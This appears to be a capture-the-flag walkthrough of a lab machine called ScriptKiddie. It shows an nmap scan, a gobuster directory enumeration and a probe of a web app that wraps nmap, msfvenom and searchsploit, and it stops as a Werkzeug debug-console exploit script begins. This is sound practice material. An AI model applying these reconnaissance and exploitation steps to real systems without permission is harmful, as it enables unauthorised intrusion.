Updated: Jul 30, 2021
# Nmap 7.91 scan initiated Sat May 29 10:06:38 2021 as: nmap -sCV -vv -oA nmap/nmap_scriptkiddieScript 10.10.10.226 Nmap scan report for 10.10.10.226 Host is up, received echo-reply ttl 63 (0.017s latency). Scanned at 2021-05-29 10:06:38 BST for 7s Not shown: 998 closed ports Reason: 998 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/YB1g/YHwZNvTzj8lysM+SzX6dZzRbfF24y3ywkhai4pViGEwUklIPkEvuLSGH97NJ4y8r9uUXzyoq3iuVJ/vGXiFlPCrg+QDp7UnwANBmDqbVLucKdor+JkWHJJ1h3ftpEHgol54tj+6J7ftmaOR29Iwg+FKtcyNG6PY434cfA0Pwshw6kKgFa+HWljNl+41H3WVua4QItPmrh+CrSoaA5kCe0FAP3c2uHcv2JyDjgCQxmN1GoLtlAsEznHlHI1wycNZGcHDnqxEmovPTN4qisOKEbYfy2mu1Eqq3Phv8UfybV8c60wUqGtClj3YOO1apDZKEe8eZZqy5eXU8mIO+uXcp5zxJ/Wrgng7WTguXGzQJiBHSFq52fHFvIYSuJOYEusLWkGhiyvITYLWZgnNL+qAVxZtP80ZTq+lm4cJHJZKl0OYsmqO0LjlMOMTPFyA+W2IOgAmnM+miSmSZ6n6pnSA+LE2Pj01egIhHw5+duAYxUHYOnKLVak1WWk/C68= | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJA31QhiIbYQMUwn/n3+qcrLiiJpYIia8HdgtwkI8JkCDm2n+j6dB3u5I17IOPXE7n5iPiW9tPF3Nb0aXmVJmlo= | 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOWjCdxetuUPIPnEGrowvR7qRAR7nuhUbfFraZFmbIr4 5000/tcp open http syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5) | http-methods: |_ Supported Methods: POST HEAD OPTIONS GET |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d'5 h4ck3r t00l5 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat May 29 10:06:45 2021 -- 1 IP address (1 host up) scanned in 7.53 seconds
OK two ports open:
22: SSH tells us it's an Ubuntu box
5000: Unusual port but NMAP says it's running a web server
A further full TCP port scan didn't find anything.
Let's go see what's at port 5000.
Web Server on port 5000
OK looks simple enough but there are no links to anywhere else. Let's give it a quick directory enumeration.
gobuster dir -u http://10.10.10.226:5000/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
Turned up nothing.
Right, looks like it's just one web application page. There has to be a way in through this page somewhere. Let's go dig into the application.
Three input functions perform some server side commands based on user input:
The nmap option does work but I can't do much with that as the input field won't take anything other than the required IP formated string. I tried to manipulate the input in BurpSuite but nothing seems to work
The payloads option is more interesting as it takes a file upload. It has three options Windows, Linux and Android. When supplying input it generates a meterpreter payload so this must be using msfvemon or msfpayload to generate it on the back end. Will need to investigate this further.
The sploits options appears to search the searchsploit database on the back end. I've had a play with the inputs but it only seems to search the database and I can't see a way to break out. I'll have a look at this in BurpSuite and see if there's something more interesting here.
Exploiting The Host
Ok so the nmap field is pretty boring so I think the next two areas are the more likely way into this box.
Poking at the Searchsploit Input Field
Let's take a look at the sploits option and see if there's anything there we can do.
First let's capture a request in BurpSuite:
Ok, this brings back a lot of entries from the searchsploit database but it seems to match what I have on my system so it looks like it is an actual real version of the database. This indicates to me that Metasploit is installed on this box for real which could be interesting.
I tried to play around with the input parameters but nothing very interesting happened. Some changes and some error messages but nothing that would indicate a way on to the box, so I need to rethink this approach.
Let's have a look at the response header:
We can see it's running Werkzeug/0.16.1 webserver. Let's take a look and see if there's any vulnerabilities for this.
Searching the searchsploit database on my host I see there is a Python script that can execute code on the server if the server has its debug console enabled.
Let's take a look at the exploit code:
#!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56